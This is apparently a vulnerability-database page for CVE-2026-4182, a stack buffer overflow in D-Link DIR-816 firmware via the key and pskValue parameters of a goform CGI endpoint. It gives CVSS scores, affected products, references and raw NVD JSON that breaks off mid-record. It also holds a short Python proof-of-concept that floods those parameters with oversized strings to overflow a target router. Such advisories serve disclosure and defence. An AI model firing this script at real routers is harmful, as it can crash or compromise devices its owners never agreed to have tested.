CVE-2026-4182

Description

A weakness has been identified in D-Link DIR-816 1.10CNB05. This impacts an unknown function of the file /goform/form2Wl5RepeaterStep2.cgi of the component goahead. This manipulation of the argument key1/key2/key3/key4/pskValue causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-816_firmware:1.10cnb05:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dir-816:-:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DIR-816 固件版本 1.10CNB05

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-4182 PoC - D-Link DIR-816 Buffer Overflow
# Target: /goform/form2Wl5RepeaterStep2.cgi
# Parameters: key1, key2, key3, key4, pskValue

target_ip = sys.argv[1] if len(sys.argv) > 1 else '192.168.0.1'
port = sys.argv[2] if len(sys.argv) > 2 else '80'
base_url = f'http://{target_ip}:{port}'

# Construct malicious payload with oversized parameters
# This triggers stack buffer overflow in form2Wl5RepeaterStep2.cgi
overflow_payload = 'A' * 1000  # Adjust size based on target

params = {
    'key1': overflow_payload,
    'key2': overflow_payload,
    'key3': overflow_payload,
    'key4': overflow_payload,
    'pskValue': overflow_payload
}

print(f'[*] Sending exploit to {base_url}')
print(f'[*] Target: D-Link DIR-816 firmware 1.10CNB05')
print(f'[*] Vulnerable endpoint: /goform/form2Wl5RepeaterStep2.cgi')
print(f'[*] Payload length: {len(overflow_payload)} bytes per parameter')

try:
    response = requests.get(f'{base_url}/goform/form2Wl5RepeaterStep2.cgi', 
                           params=params, timeout=10)
    print(f'[*] Response status: {response.status_code}')
except requests.exceptions.RequestException as e:
    print(f'[!] Request failed: {e}')
    print('[*] Target may be vulnerable or not reachable')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4182
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4182
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4182/
[4] VulDB https://vuldb.com/cve/CVE-2026-4182
[5] https://github.com/wudipjq/my_vuln/blob/main/D-Link7/vuln_86/86.md
[6] https://vuldb.com/?ctiid.351086
[7] https://vuldb.com/?id.351086
[8] https://vuldb.com/?submit.769830
[9] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4182", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:59.017", "lastModified": "2026-03-19T19:57:16.557", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A weakness has been identified in D-Link DIR-816 1.10CNB05. This impacts an unknown function of the file /goform/form2Wl5RepeaterStep2.cgi of the component goahead. This manipulation of the argument key1/key2/key3/key4/pskValue causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Se ha identificado una debilidad en D-Link DIR-816 1.10CNB05. Esto afecta a una función desconocida del archivo /goform/form2Wl5RepeaterStep2.cgi del componente goahead. Esta manipulación del argumento key1/key2/key3/key4/pskValue causa desbordamiento de búfer basado en pila. La explotación remota del ataque es posible. El exploit se ha puesto a disposición del público y podría ser utilizado para ataques. Esta vulnerabilidad solo afecta a productos que ya no reciben soporte por parte del mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-816_firmware:1.10cnb05:*:*:*:*:*:*:*", "matchCriteriaId": "6A221E99-E2B0-4C57-9263-9A86EFF8746E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-816:-:*:*:*:*:*:*:*", "matchCriteriaId": "B54058C1-B58F-434A-ABF0-A6B314A1AB14"}]}]}], "references": [{"url": "https://github.com/wudipjq/my_vuln/blob/main/D-Link7/vuln_86/86.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.351086", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.351086", "source": "[email protected]", "tags": ["Third Party ... (truncated)